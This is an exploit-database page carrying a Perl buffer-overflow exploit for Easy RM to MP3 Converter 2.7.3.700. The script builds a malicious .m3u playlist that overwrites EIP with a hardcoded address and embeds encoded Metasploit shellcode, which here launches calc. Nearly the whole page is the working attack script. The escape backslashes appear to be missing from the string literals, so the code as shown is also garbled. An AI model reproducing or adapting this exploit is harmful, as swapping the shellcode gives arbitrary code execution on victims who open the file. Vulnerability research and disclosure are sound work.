Easy RM to MP3 Converter 2.7.3.700

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Easy RM to MP3 Converter 2.7.3.700
# Published : 2009-12-10
# Author : Vinod Sharma
# Previous Title : Xenorate 2.50(.xpl) universal Local Buffer Overflow Exploit (SEH) (meta)
# Next Title : Audio Workstation v6.4.2.4.0 (.pls) Universal Local BoF Exploit

#!/usr/bin/perl
# Easy RM to MP3 Converter 2.7.3.700 (.m3u) File WinXP Sp2 Buffer Overflow Exploit
# Author: Vinod Sharma
# Download :  http://www.rm-to-mp3.net/EasyRMtoMP3Converter.exe
# Tested : Windows XP SP2 (En)
# Thanks to exploit-db
# Originally published at : http://securitygyan.com/2009/12/10/easyrmtomp3-m3ufile-exploit/
#Vulnerability discovered by CYBER-ZONE 
#Advisory:http://secunia.com/advisories/34653
my $file= "exploit.m3u";
my $junk= "x41" x 26059;
my $eip= pack('V', 0x01a8f23a);
my $shellcode= "x90" x 25;

#/*
 #* windows/exec - 223 bytes
 #* http://www.metasploit.com
 #* Encoder: x86/shikata_ga_nai
 #* EXITFUNC=thread, CMD=calc
 #*/
$shellcode = $shellcode. 
"x31xc9xdaxd4xb1x33xbdxecx71x94xdexd9x74x24xf4".
"x5fx31x6fx15x03x6fx15x83x2bx75x76x2bx4fx9exff".
"xd4xafx5fx60x5cx4ax6exb2x3ax1fxc3x02x48x4dxe8".
"xe9x1cx65x7bx9fx88x8axccx2axefxa5xcdx9ax2fx69".
"x0dxbcxd3x73x42x1exedxbcx97x5fx2axa0x58x0dxe3".
"xafxcbxa2x80xedxd7xc3x46x7ax67xbcxe3xbcx1cx76".
"xedxecx8dx0dxa5x14xa5x4ax16x25x6ax89x6ax6cx07".
"x7ax18x6fxc1xb2xe1x5ex2dx18xdcx6fxa0x60x18x57".
"x5bx17x52xa4xe6x20xa1xd7x3cxa4x34x7fxb6x1ex9d".
"x7ex1bxf8x56x8cxd0x8ex31x90xe7x43x4axacx6cx62".
"x9dx25x36x41x39x6execxe8x18xcax43x14x7axb2x3c".
"xb0xf0x50x28xc2x5ax3exafx46xe1x07xafx58xeax27".
"xd8x69x61xa8x9fx75xa0x8dx40x94x61xfbxe8x01xe0".
"x46x75xb2xdex84x80x31xebx74x77x29x9ex71x33xed".
"x72x0bx2cx98x74xb8x4dx89x16x5fxdex51xf7xfax66".
"xf3x07";

$shellcode = $shellcode."x90" x 25;
open($FILE, ">$file");
print($FILE $junk.$eip.$shellcode);
close($FILE);
print("exploit created successfully");